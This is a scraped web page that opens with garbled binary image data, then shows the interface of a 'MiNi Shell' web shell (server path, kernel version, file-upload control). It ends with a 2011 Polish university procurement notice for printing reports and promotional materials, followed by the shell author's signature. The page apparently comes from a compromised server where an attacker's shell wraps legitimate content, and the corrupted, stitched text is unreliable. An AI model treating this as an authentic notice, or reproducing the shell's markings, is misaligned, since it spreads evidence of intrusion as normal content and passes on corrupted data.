JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110124/11364-N-2011.html

<p class="kh_header"><b>Zamość: Usługa druku dwóch raportów oraz wykonania  materiałów informacyjno - promocyjnych w związku z realizacją Projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa -  w  ramach  Programu  Operacyjnego Kapitał Ludzki współfinansowanego  ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 11364 - 2011; data zamieszczenia: 24.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Szymona Szymonowica w Zamościu , ul. Akademicka 8, 22-400 Zamość, woj. lubelskie, tel. 084 6383555, 6383444, faks 084 6383500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pwszzamosc.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa druku dwóch raportów oraz wykonania  materiałów informacyjno - promocyjnych w związku z realizacją Projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa -  w  ramach  Programu  Operacyjnego Kapitał Ludzki współfinansowanego  ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa druku dwóch raportów oraz wykonania  materiałów informacyjno - promocyjnych w związku z realizacją Projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa - w  ramach  Programu  Operacyjnego Kapitał Ludzki współfinansowanego  ze środków Europejskiego Funduszu Społecznego, z podziałem na  nw. części:
Część 1  zamówienia -  usługa druku dwóch raportów (raport nr 1- liczba egzemplarzy: 100 szt., liczba stron: 100; raport nr 2- liczba egzemplarzy: 100 szt., liczba stron: 100) 
Część 2 zamówienia - wykonania materiałów informacyjno - promocyjnych ( długopis z nadrukiem - 100 szt., blok notatnikowy - 100 szt., teczki firmowe- 100 szt. ) 
2. Szczegółowy opis przedmiotu zamówienia na poszczególne części zawiera:
załącznik nr 1 do siwz- Opis Przedmiotu zamówienia /dotyczy wszystkich części/
 załącznik nr 1.1 do siwz - dot. części 1 zamówienia
załącznik nr 1.2 do siwz - dot. części 2 zamówienia
3. Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 2 do siwz.  
4. Zamawiający dopuszcza możliwości składania ofert częściowych,  co oznacza że Wykonawca może złożyć oferty częściowe na jedną lub więcej części według powyższego podziału na części.
5. Zamawiający nie dopuszcza składania ofert wariantowych.
6. Zamawiający nie przewiduje aukcji elektronicznej.
7. Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
8. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy Podwykonawcom.
9. Tam gdzie Zamawiający powołuje się na rozwiązania równoważne - produkt powinien być jakościowo nie gorsze niż wskazany i spełniać te same funkcje..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 39.29.41.00-0, 22.46.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Formularz oferty zgodnie ze wzorem stanowiącym załącznik Nr 5 do siwz (oryginał); 
b)  Oświadczenia i dokumenty wymienione w rozdziale IV niniejszej SIWZ AI 261-02-11;
c)  W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa lub kopii potwierdzonej przez notariusza lub mocodawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pwszzamosc.pl; http://83.3.123.29/bip/bip/zam-wienia-publiczne/zamowienia-2011.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Przyrodniczo-Techniczny PWSZ Zamościu, ul. Jana Zamoyskiego 64, 22-400 Zamość, tel. (084) 638 09 40, w.21 pok.27 od poniedziałku do piątku w godzinach od 9.00 do 14.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2011 godzina 09:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Szymona Szymonowica w Zamościu ul. Akademicka 8, 22-400 Zamość w sekretariacie (Pokój nr 32); od poniedziałku do piątku w godzinach od 8.00 do 16.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III, Działanie 3.3,  Projekt: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa
2.Osobami uprawnionymi do porozumiewania się z Wykonawcami są: 
w sprawach związanych z przedmiotem zamówienia: 
część 1 zamówienia - Marta Worobij - tel. 84/ 627 84 04
cześć 2 zamówienia: Monika Jucewicz -  tel.(084) 638 09 40	
w sprawach procedury przetargowej: Mariola Franczak -  tel.(084) 638 09 40
3. Wymagany termin zakończenia realizacji umowy: 31 marca 2011r. 
z zastrzeżeniem § 4 projektu umowy stanowiący załącznik do siwz..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa druku dwóch raportów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SKŁAD I WYDRUK RAPORTÓW
1. Raport 1
- format A4
- okładka - karton 215 g, jednostronnie kolor granatowy, foliowana, matowa
- środek - czarno-biały - papier offset 80 g
- liczba stron - 100
- liczba egzemplarzy - 100
- nadruk na okładce - pełen kolor
przód okładki
1) logo PO KL, 2) flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, 3) logo projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, 4) informacja o współfinansowaniu, 5) nazwa projektu6) pionowy pasek dwukolorowy
tył okładki
1) logo PWSZ im. Szymona Szymonowica w Zamościu, 2) logo INSE Sp. z o.o. w Łodzi, 3) herb Miasta Zamość

2. Raport 2
- format A4
- okładka - karton 215 g, jednostronnie kolor granatowy, foliowana, matowa
- środek - czarno-biały - papier offset 80 g
- liczba stron - 100
- liczba egzemplarzy - 100
- nadruk na okładce - pełen kolor
przód okładki
1) logo PO KL, 2) flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, 3) logo projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, 4) informacja o współfinansowaniu, 5) nazwa projektu, 6) pionowy pasek dwukolorowy
tył okładki
2)logo PWSZ im. Szymona Szymonowica w Zamościu, 2) logo INSE Sp. z o.o. w Łodzi, 3) herb Miasta Zamość,

Materiały merytoryczne (treść raportów)  służące wykonaniu zamówienia Zamawiający przekaże Wykonawcy w formie elektronicznej.
Oba raporty będą posiadały numer ISBN nadany przez Zamawiającego 
Szczegółowy opis przedmiotu zamówienia zawiera:
załącznik nr 1 do siwz- Opis Przedmiotu zamówienia /dotyczy wszystkich części/
załącznik nr 1.2 do siwz - dot. części 2 zamówienia

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 2 do  siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa wykonania materiałów informacyjno - promocyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MATERIAŁY DLA UCZESTNIKÓW SEMINARIUM
1.  DŁUGOPIS Z NADRUKIEM     
Metal/plastik z ergonomiczną gumką; automatyczny (wciskany i wyciskany) z klipsem. Korpus w kolorze srebrnym, nadruk czarny.
Dostępny w katalogu   http://www.adpen.pl/produkt.php?id=687 lub równoważny.
Wkład: kolor niebieski
Nadruk:  1) logo PO KL, 2) flaga Unii Europejskiej z odwołaniem do Unii Europejskiej, 3) logo projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, 4) adres strony internetowej,  5) adres e-mail projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa.
Ilość: 100 sztuk

2.  BLOK NOTATNIKOWY
Format: A4 (210 x 297 mm)
Papier: offset 80g, biały, papier linie
Ilość kartek: 30
Strona klejenia: wzdłuż górnej krawędzi
Nadruk: 1) logo PO KL, 2) flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, 3) logo projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, 4) logo PWSZ im. Szymona Szymonowica w Zamościu, 5) logo INSE Sp. z o.o. w Łodzi, 6) herb Miasta Zamość, 7) informacja o współfinansowaniu, 8) dane teleadresowe
Nadruk: czarno-biały
Ilość: 100 sztuk

3.  TECZKI FIRMOWE 
Format: 22 x 30,5 cm (na dokumenty formatu A4)
Papier: sztywny karton 250-300g, folia matowa
Kolor: teczka srebrna, nadruk w pełnym kolorze 
Nadruk: 1) logo PO KL, 2) flaga Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, 3) logo projektu: Praktyki pedagogiczne drogą do innowacyjnego szkolnictwa, 4) logo PWSZ im. Szymona Szymonowica w Zamościu, 5) logo INSE Sp. z o.o. w Łodzi, 6) herb Miasta Zamość, 7) informacja o współfinansowaniu, 8) dane teleadresowe
Ilość: 100 sztuk
Szczegółowy opis przedmiotu zamówienia na poszczególne części zawiera:
załącznik nr 1 do siwz- Opis Przedmiotu zamówienia /dotyczy wszystkich części/
załącznik nr 1.1 do siwz - dot. części 1 zamówienia
Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 2 do niniejszej siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9, 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com